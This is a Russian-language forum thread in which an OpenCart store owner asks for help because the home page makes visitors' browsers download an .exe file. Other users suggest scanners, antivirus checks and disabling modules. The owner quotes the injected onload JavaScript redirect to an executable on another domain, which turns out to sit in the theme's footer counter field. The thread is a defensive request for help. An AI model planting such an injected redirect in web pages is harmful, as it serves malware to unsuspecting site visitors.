Перейти к публикации
Поиск в
  • Дополнительно...
Искать результаты, содержащие...
Искать результаты в...

Вирус закачивается на компьютер при открытии сайта


borborich
 Поделиться

Рекомендованные сообщения

ocstore 2.3.0.2.3 
newstore

При посещении главной страницы сайта, загружается на компьютер exe файл c другого магазина сделаного также на opencart
обращение в поддержку хостинга особо не помогло.
Где копать?

Ссылка на комментарий
Поделиться на других сайтах


09.10.2022 в 09:27, borborich сказал:

Где копать?

Заходите в панель управления хостинга и ищите измененные файлы, время создания/модификации которых отличается от остальных. 

Известно ли, как называется вредоносный exe?

Изменено пользователем esculapra
Ссылка на комментарий
Поделиться на других сайтах

09.10.2022 в 08:27, borborich сказал:

ocstore 2.3.0.2.3 
newstore

При посещении главной страницы сайта, загружается на компьютер exe файл c другого магазина сделаного также на opencart
обращение в поддержку хостинга особо не помогло.
Где копать?

 

https://opencartforum.com/files/file/8788-chistka-saytov-i-serverov-ot-virusov/

  • +1 1
Ссылка на комментарий
Поделиться на других сайтах

09.10.2022 в 08:47, esculapra сказал:

Заходите в панель управления хостинга и ищите измененные файлы, время создания/модификации которых отличается от остальных. 

Известно ли, как называется вредоносный exe?

 

Делал откат на месяц назад, тогда этой проблемы не было, но не помогло.
Файл называется прайслист.exe качается с другого сервера.

Ссылка на комментарий
Поделиться на других сайтах


10.10.2022 в 09:37, borborich сказал:

Делал откат на месяц назад

Откат помогает только восстановить предыдущие версии файлов. Но никак не влияет на добавленные. Троян может сидеть в картинках, например. Попробуй установить бесплатный скрипт ai-bolit и поискать с его помощью.  Если вирус закачивается только с главной страницы, то нужно определить от какого модуля это идет, то есть отключать модули и смотреть, чтобы потом сузить область поиска.

Ссылка на комментарий
Поделиться на других сайтах

10.10.2022 в 09:21, esculapra сказал:

Откат помогает только восстановить предыдущие версии файлов. Но никак не влияет на добавленные. Троян может сидеть в картинках, например. Попробуй установить бесплатный скрипт ai-bolit и поискать с его помощью.  Если вирус закачивается только с главной страницы, то нужно определить от какого модуля это идет, то есть отключать модули и смотреть, чтобы потом сузить область поиска.

Спасибо, сейчас буду делать

 

Ссылка на комментарий
Поделиться на других сайтах


10.10.2022 в 09:21, esculapra сказал:

Откат помогает только восстановить предыдущие версии файлов. Но никак не влияет на добавленные. Троян может сидеть в картинках, например. Попробуй установить бесплатный скрипт ai-bolit и поискать с его помощью.  Если вирус закачивается только с главной страницы, то нужно определить от какого модуля это идет, то есть отключать модули и смотреть, чтобы потом сузить область поиска.

 

ai-bolt что то пропустил все файлы

Schermata 2022-10-10 alle 11.59.07.png

Ссылка на комментарий
Поделиться на других сайтах


10.10.2022 в 13:00, borborich сказал:

 

ai-bolt что то пропустил все файлы

Schermata 2022-10-10 alle 11.59.07.png

Как бы смешно не звучало, но мне в подобной беде помог, антивирус ПК, скачал сайт на пк и проверил и он нашел 8 картинок, которые были вирусом

Изменено пользователем SSHEVA
  • +1 1
Ссылка на комментарий
Поделиться на других сайтах


10.10.2022 в 12:12, SSHEVA сказал:

Как бы смешно не звучало, но мне в подобной беде помог, антивирус ПК, скачал сайт на пк и проверил и он нашел 8 картинок, которые были вирусом

 

каким антивирусом пользовались?

Ссылка на комментарий
Поделиться на других сайтах


10.10.2022 в 14:16, borborich сказал:

 

каким антивирусом пользовались?

ESET SMART SECURITY PREMIUM

Ссылка на комментарий
Поделиться на других сайтах


10.10.2022 в 13:12, SSHEVA сказал:

Как бы смешно не звучало, но мне в подобной беде помог, антивирус ПК

Я еще не успел этого написать. Да, если на сайте плотно поковырялись, то антивирус реально найдет. Айболит должен был найти, но видимо там нет явного кода. Можно попробовать параноидальный режим. Хотя, если это в картинках то может не найти - проще посмотреть исходный код страницы и какие картинки подключаются, а потом сравнить их по времени создания. Картинки также могут подключаться через стили, но тут откат бы все исправил.

Изменено пользователем esculapra
Ссылка на комментарий
Поделиться на других сайтах

10.10.2022 в 16:44, borborich сказал:

ссыль на файл прям в боди вставляется, скачиваю файлы сайта на компьютер чтоб сканировать.

Schermata 2022-10-10 alle 15.03.48.png

После проверки антивирусов, если что еще проверьте скрипты и все файлы дизайна в ручную, для ускорения можно еще  Поиск использовать в редакторе.

Ссылка на комментарий
Поделиться на других сайтах


10.10.2022 в 15:54, SSHEVA сказал:

После проверки антивирусов, если что еще проверьте скрипты и все файлы дизайна в ручную, для ускорения можно еще  Поиск использовать в редакторе.

спасибо, собственно для этого и скачиваю

Ссылка на комментарий
Поделиться на других сайтах


Антивирус ни чего не находит в файлах, попытки найти в файлах какую либо часть этого хвоста onload="javascript:window.location.href = 'https://f-sladosti.ru/image/НашПрайс2022Dec.exe';">
дают ноль результатов

Ссылка на комментарий
Поделиться на других сайтах


11.10.2022 в 12:18, borborich сказал:

Антивирус ни чего не находит в файлах, попытки найти в файлах какую либо часть этого хвоста onload="javascript:window.location.href = 'https://f-sladosti.ru/image/НашПрайс2022Dec.exe';">
дают ноль результатов

Тогда нужно смотреть уже сайт, так вслепую сложно сказать

Ссылка на комментарий
Поделиться на других сайтах


Нашелся в конфигах подвала newstore, теперь бы понять как он туда попал и как этого избежать
@29aleksey есть предположения?
 

Schermata 2022-10-11 alle 14.41.56.png

Ссылка на комментарий
Поделиться на других сайтах


В настройки шаблона в поле код счетчика прописывается только с админки 

Ссылка на комментарий
Поделиться на других сайтах

11.10.2022 в 20:38, 29aleksey сказал:

В настройки шаблона в поле код счетчика прописывается только с админки 

 

подозреваю тогда что администратор цен магазина имел троян на компьютере, через который и прописалось туда

Ссылка на комментарий
Поделиться на других сайтах


В 12.10.2022 в 15:48, borborich сказав:

 

подозреваю тогда что администратор цен магазина имел троян на компьютере, через который и прописалось туда

Звучит это все как фантастика :huh:

Ссылка на комментарий
Поделиться на других сайтах

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас
 Поделиться

×
×
  • Создать...

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.